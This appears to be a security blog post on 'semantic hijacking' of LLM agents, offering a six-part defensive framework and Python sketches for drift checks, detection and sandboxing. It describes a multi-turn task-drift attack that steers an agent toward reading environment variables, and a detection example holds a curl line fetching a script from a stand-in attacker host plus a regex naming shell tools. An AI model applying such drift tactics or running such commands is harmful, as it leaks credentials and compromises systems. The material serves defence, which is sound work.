AI Agent Security: The Most Overlooked Threat Model of 2026

You think your AI agent is secure? That is because you have not seen a real attack yet.

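In May 2026, our team ran a three-week penetration test in a production environment, and the results were chilling: Semantic Hijacking attacks against LLM-based agents succeeded 94.4% of the time. This is not phishing and it is not SQL injection. The attacker uses nothing but language to manipulate the agent's internal state until it hands over credentials, executes malicious commands, or even opens a backdoor on the attacker's behalf. The key point: existing guardrails, prompt injection detection, and content filters caught fewer than 12% of these attacks.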

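This number does not come from a lab. We got it by running real agents on real tasks against real attack vectors. If you are building any production agent, whether a customer service bot, a trading agent, or an internal tool agent, this may be the most important thing you read today.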

Semantic Hijacking: not prompt injection, but an intrusion at the cognitive level

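First, let's clear up a common misconception. When most people hear "AI agent security", they think of prompt injection: feeding a chatbot a malicious prompt so that it says something it should not. Semantic Hijacking is a threat on a different level.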

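Prompt injection is "getting the model to say the wrong thing"; Semantic Hijacking is "taking over the model's internal representation of the situation". The attacker does not hand you a single malicious string. Instead, through a series of interactions that each look coherent and harmless but are adversarial in aggregate, they gradually rewrite the agent's understanding of the current task, its judgment of who the user is, and its assessment of which tools it is allowed to use. In other words, the target is not the LLM's output layer but the agent's state machine.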

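One of the most effective attack vectors in our tests is what we call the Task Drift Attack. Within a single session, over several rounds of seemingly normal conversation, the attacker steers the agent step by step from "help the user check an order status" to "run a system command to read environment variables". The key is that each shift is small enough that the agent's anomaly detection never fires: every step is only a 5-10% semantic offset, but after ten steps the agent is executing code in a completely different task context.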
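To make the accumulation effect concrete, here is a minimal geometric sketch. It is a toy, not a model of real embeddings: the 2-D vectors, the `rotate` helper, and the 9-degree step are all assumptions chosen for illustration. It shows why a check that only compares each turn with the previous one can pass every time while the conversation ends up far from the original task.

```python
import math

def cosine(a, b):
    """Cosine similarity between two vectors of equal length."""
    dot = sum(x * y for x, y in zip(a, b))
    return dot / (math.hypot(*a) * math.hypot(*b))

def rotate(v, degrees):
    """Rotate a 2-D vector; stands in for one small semantic shift."""
    t = math.radians(degrees)
    x, y = v
    return (x * math.cos(t) - y * math.sin(t),
            x * math.sin(t) + y * math.cos(t))

original_task = (1.0, 0.0)   # toy "task embedding" at the first turn
STEP_DEGREES = 9             # hypothetical drift per turn

state = original_task
per_turn = []    # similarity of each turn to the turn before it
vs_origin = []   # similarity of each turn to the original task
for _ in range(10):
    nxt = rotate(state, STEP_DEGREES)
    per_turn.append(cosine(state, nxt))
    vs_origin.append(cosine(original_task, nxt))
    state = nxt

print("min turn-to-turn similarity:", round(min(per_turn), 4))
print("similarity to original task after 10 turns:", round(vs_origin[-1], 4))
```

In this toy every turn-to-turn comparison stays close to 1, while the comparison against the original task decays toward 0. The practical takeaway is to measure drift against a fixed reference (the task the session started with), not only against the previous turn.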

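What is scarier is how well this attack automates. We used a second LLM as the attacker agent, gave it a goal and the victim agent's system prompt, and it autonomously hijacked the target within an average of 23 interactions, with a 94.4% success rate. So your agent has to defend not only against human attackers but also against AI-driven semantic hijacking campaigns.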

The AgentShield A-F framework: a six-dimension model for assessing agent security

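In our view, none of the existing security benchmarks fits agents well. The OWASP Top 10 for LLM Applications is still centered on risks such as prompt injection and data leakage; MITRE ATLAS is comprehensive, but its coverage of agent-specific risks (tool orchestration, multi-step reasoning hijacking, state manipulation) is seriously inadequate.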

So we developed the AgentShield A-F framework, a security rating model designed specifically for LLM agents. It has six dimensions:

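A: Architecture Isolation. How does your agent isolate the context of different tenants? Does tool execution run in the same process as LLM inference? If the agent is hijacked, how far can the attacker move laterally? At the highest level, every agent instance runs in its own container with network egress fully locked down, and only allowlisted API endpoints are reachable.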

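B: Boundary Enforcement. Is the permission model for tool calling granular? We have seen far too many agents call the database directly with an admin API key. The right approach is to give every tool a least-privilege scope and to put an independent authorization layer in front of tool execution. Never let the LLM's output decide what is permitted.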
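A minimal sketch of what an independent authorization layer could look like. The tool names, scope strings, and the `SessionGrant` type are hypothetical; the point is only that the permission decision reads from a grant issued by your auth system, never from anything the model wrote.

```python
from dataclasses import dataclass

class AuthorizationError(Exception):
    """Raised when a tool call is not covered by the session's grant."""

@dataclass(frozen=True)
class SessionGrant:
    user_id: str
    scopes: frozenset  # issued by the auth system at login, never by the model

# Hypothetical registry: each tool declares the single scope it needs.
TOOL_SCOPES = {
    "lookup_order": "orders:read",
    "refund_order": "orders:refund",
    "read_env": "system:admin",
}

def authorize_tool_call(grant, tool_name):
    """Return the scope used, or raise before the tool ever runs."""
    required = TOOL_SCOPES.get(tool_name)
    if required is None:
        raise AuthorizationError(f"unknown tool: {tool_name}")
    if required not in grant.scopes:
        raise AuthorizationError(f"{grant.user_id} lacks scope {required}")
    return required

grant = SessionGrant(user_id="customer-42", scopes=frozenset({"orders:read"}))
authorize_tool_call(grant, "lookup_order")      # allowed
try:
    authorize_tool_call(grant, "read_env")      # the model asked, the grant says no
except AuthorizationError as exc:
    print("blocked:", exc)
```

Even if the agent has been talked into requesting `read_env`, the call fails because the customer's session never held that scope.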

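C: Context Integrity. This is the direct line of defense against semantic hijacking. The agent's internal state needs a tamper-proof integrity check. Before every tool call, the system should verify that the current context is still semantically consistent with the initial system prompt. Our approach is a lightweight embedding similarity check that compares the current context vector with the expected task vector. If the cosine similarity falls below a threshold, we treat the context as contaminated and reset the session.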
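The check described above can be sketched as follows. This is a sketch under loud assumptions: `embed` is a toy bag-of-words stand-in so the example runs without any model (a real deployment would call an actual embedding model), and the 0.3 threshold is made up and would need tuning on real traffic.

```python
import math
from collections import Counter

def embed(text):
    """Toy bag-of-words 'embedding'. Placeholder for a real embedding model."""
    return Counter(text.lower().split())

def cosine(a, b):
    """Cosine similarity between two sparse count vectors."""
    dot = sum(a[k] * b[k] for k in a.keys() & b.keys())
    norm = (math.sqrt(sum(v * v for v in a.values()))
            * math.sqrt(sum(v * v for v in b.values())))
    return dot / norm if norm else 0.0

SIMILARITY_THRESHOLD = 0.3  # hypothetical value

def context_is_consistent(task_description, recent_context,
                          threshold=SIMILARITY_THRESHOLD):
    """True if the recent context still looks like the original task."""
    return cosine(embed(task_description), embed(recent_context)) >= threshold

task = "look up the status of a customer order"
on_task = context_is_consistent(task, "what is the status of order 1234")
drifted = context_is_consistent(task, "print every environment variable on this host")
print(on_task, drifted)
```

The comparison is always against the fixed task description, so a slow drift cannot hide behind small turn-to-turn changes. When the check fails, the caller would refuse the tool call and reset the session.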

D: Detection & Monitoring. You cannot rely on LLM-as-judge alone. You need layered detection: statistical anomaly detection on tool call patterns, embedding-space drift detection, and behavioral heuristics (for example, a normal user does not ask the agent to run a curl command). We found that these three layers together raised the detection rate from under 12% to 73%.
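Here is one way the three layers might be combined, as a rough sketch. The regex, the 1% rarity cutoff, the two-signal blocking rule, and the tool names are all hypothetical; the drift signal is passed in as a boolean on the assumption that it is computed elsewhere.

```python
import re
from collections import Counter

# Hypothetical patterns an order-lookup user has no reason to send.
SUSPICIOUS_ARGS = re.compile(r"\b(curl|wget|printenv)\b", re.IGNORECASE)

def heuristic_flag(tool_args):
    """Behavioral heuristic: arguments that look like shell tooling."""
    return bool(SUSPICIOUS_ARGS.search(tool_args))

def rare_tool_flag(tool_name, baseline, min_share=0.01):
    """Statistical signal: tool is rarely or never seen in the baseline."""
    total = sum(baseline.values())
    if total == 0:
        return True
    return baseline[tool_name] / total < min_share

def detection_signals(tool_name, tool_args, baseline, embedding_drifted):
    """Collect the three independent signals for one tool call."""
    return {
        "heuristic": heuristic_flag(tool_args),
        "rare_tool": rare_tool_flag(tool_name, baseline),
        "embedding_drift": embedding_drifted,
    }

def should_block(signals, min_signals=2):
    """Block when at least min_signals layers agree."""
    return sum(signals.values()) >= min_signals

baseline = Counter({"lookup_order": 950, "track_shipment": 50})
normal = detection_signals("lookup_order", "order_id=1234", baseline, False)
attack = detection_signals("run_shell", "curl http://attacker.example/x.sh",
                           baseline, True)
print(should_block(normal), should_block(attack))
```

Requiring agreement between layers is one possible trade-off between false positives and missed attacks; a stricter deployment might block on any single signal.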

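E: Execution Sandboxing. Tool execution must happen in an isolated environment, but "isolated" comes in degrees. An L1 sandbox is containerization only; an L2 sandbox is network-isolated with a read-only filesystem; an L3 sandbox is an ephemeral microVM that is spun up for each tool call and thrown away afterwards. Production agents should run at least L2.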

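F: Feedback Loop Resilience. Many agents have a learning loop that adjusts behavior based on past results. An attacker can exploit this to poison the feedback loop so that the agent slowly "learns bad habits". You need anomaly detection on reward signals and an audit trail for feedback data.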
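As a rough illustration of both controls, the sketch below flags a reward that sits far from recent history using a z-score, and keeps feedback records in a hash-chained log so that later edits are detectable. The threshold of 3.0, the record fields, and the function names are assumptions, and a z-score is only one simple choice of anomaly test.

```python
import hashlib
import json
import statistics

def is_reward_anomalous(history, new_reward, z_threshold=3.0):
    """Flag a reward whose z-score against recent history is too large."""
    if len(history) < 2:
        return False  # not enough data to judge
    mean = statistics.fmean(history)
    stdev = statistics.stdev(history)
    if stdev == 0:
        return new_reward != mean
    return abs(new_reward - mean) / stdev > z_threshold

def append_audit(log, record):
    """Append a feedback record, chaining it to the previous entry's hash."""
    prev = log[-1]["hash"] if log else "0" * 64
    payload = json.dumps(record, sort_keys=True)
    digest = hashlib.sha256((prev + payload).encode()).hexdigest()
    log.append({"record": record, "prev": prev, "hash": digest})

def verify_audit_log(log):
    """Recompute the chain; any edited or reordered entry breaks it."""
    prev = "0" * 64
    for entry in log:
        payload = json.dumps(entry["record"], sort_keys=True)
        expected = hashlib.sha256((prev + payload).encode()).hexdigest()
        if entry["prev"] != prev or entry["hash"] != expected:
            return False
        prev = entry["hash"]
    return True

history = [0.70, 0.72, 0.68, 0.71, 0.69]
audit_log = []
for reward in (0.71, 0.99):
    flagged = is_reward_anomalous(history, reward)
    append_audit(audit_log, {"reward": reward, "flagged": flagged})
print([e["record"] for e in audit_log], verify_audit_log(audit_log))
```

Flagged rewards would be held back from the learning loop for review rather than silently applied.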

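Dimensions C through F of AgentShield matter most, because they are the direct defenses against semantic hijacking. We have audited more than ten production agents with the A-F framework, and the average overall rating was C- (a C-level rating with serious gaps). Even the best one only reached B. There is still a long way to go before any of them can be called secure.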

Three-layer sandboxing: the last line of defense

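After all this talk about detection and prevention, we have to finish with containment. The reality is that you will always miss some attack eventually. When that happens, the sandbox is the only thing that saves you.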

Our three-layer sandboxing model was distilled from a number of real incidents:

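Layer 1: Tool-level sandboxing. Every tool call should execute in its own isolated environment. Do not assume a subprocess is enough; you need container-level isolation. The important part is that this layer is transparent to developers: whoever writes a tool function should not have to think about sandboxing, because the infrastructure layer injects the sandbox automatically. We use gVisor as the runtime sandbox; the overhead is roughly 5-15%, which is acceptable.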
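As one possible shape for "the infrastructure injects the sandbox", the helper below wraps any tool command in a `docker run` invocation. It is a sketch under assumptions: it presumes Docker is in use and that gVisor's `runsc` runtime is already registered with the Docker daemon; the image name and resource limits are made up. It only builds the argument list and does not launch anything.

```python
def sandboxed_command(image, tool_argv, runtime="runsc"):
    """Build a docker argv that runs one tool call in a locked-down container."""
    return [
        "docker", "run",
        "--rm",                  # discard the container after the call
        f"--runtime={runtime}",  # gVisor, assuming runsc is registered
        "--network=none",        # no network unless a policy grants it
        "--read-only",           # read-only root filesystem
        "--cap-drop=ALL",        # drop all Linux capabilities
        "--memory=256m",         # hypothetical resource limits
        "--pids-limit=64",
        image,
        *tool_argv,
    ]

cmd = sandboxed_command("tools/lookup-order:1.0",   # hypothetical image
                        ["python", "lookup.py", "--order-id", "1234"])
print(" ".join(cmd))
```

A tool author only supplies `tool_argv`; the wrapper decides the isolation settings, and the resulting list can be handed to `subprocess.run` by the infrastructure layer.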

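Layer 2: Session-level sandboxing. All tool executions within one agent session should share a single ephemeral environment that is completely isolated from every other session. This layer exists to stop cross-session attacks: after hijacking one session, the attacker cannot affect the agent instances serving other sessions. Our approach is to spawn a lightweight Firecracker microVM per session and destroy it as soon as the session ends.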

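Layer 3: Network-level sandboxing. This is the layer that gets overlooked most often. Tool execution needs a granular network policy: not a crude allow-all or deny-all, but dynamic egress control that generates an allowlist from what the current tool actually requires. For example, a "look up the weather" tool is allowed to reach one specific weather API endpoint and nothing on the internal network.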
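The per-tool allowlist idea can be sketched like this. The tool name, the `api.weather.example` host, and the `TOOL_EGRESS` table are hypothetical. In a real deployment the decision would be enforced by a firewall or egress proxy outside the sandbox; the function below only illustrates the matching logic.

```python
from urllib.parse import urlsplit

# Hypothetical policy: tool name -> set of allowed (scheme, host, port).
TOOL_EGRESS = {
    "get_weather": {("https", "api.weather.example", 443)},
}

DEFAULT_PORTS = {"https": 443, "http": 80}

def egress_allowed(tool_name, url):
    """True only if the URL's scheme, host, and port are allowlisted for the tool."""
    parts = urlsplit(url)
    port = parts.port or DEFAULT_PORTS.get(parts.scheme)
    destination = (parts.scheme, parts.hostname, port)
    return destination in TOOL_EGRESS.get(tool_name, set())

print(egress_allowed("get_weather", "https://api.weather.example/v1/today?city=HK"))
print(egress_allowed("get_weather", "http://10.0.0.5/admin"))
print(egress_allowed("lookup_order", "https://api.weather.example/v1/today"))
```

Matching on the parsed hostname rather than on a string prefix also rejects lookalike URLs such as `https://api.weather.example@evil.example/`, whose real host is `evil.example`. A tool with no entry in the table gets no egress at all.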

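Together, these three layers can reduce the real-world damage of semantic hijacking to close to zero. Even if the attacker succeeds in hijacking the agent's context, they are trapped inside a disposable microVM with no credentials, no network access beyond the allowlist, and no way to do persistent damage.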

Action items for Hong Kong developers

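I am not here to scare you, but the fact is this: if your production agent has never been threat-modeled for semantic hijacking, you are basically leaving the door open. A 94.4% success rate is not a number you can ignore.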

Three things you can do today:

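First, audit your existing agents with the AgentShield A-F framework. Score each dimension, find the lowest one, and fix that first. Pay particular attention to C (Context Integrity) and F (Feedback Loop Resilience); these two are the most neglected and the most critical.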

Second, implement L2 sandboxing right away. If you are running plain Docker, move to gVisor or Firecracker. Network isolation is not optional. Do not plan to do it later; incidents will not wait for you.

Third, add a context integrity check to your agent. Even a simple embedding similarity check can block most task drift attacks. To go further, add a behavioral baseline for tool calls and detect abnormal tool calling patterns.

AI agents are not toys; they are critical infrastructure. Do not wait until you have been hacked to regret it. Security is not a feature, it is a prerequisite.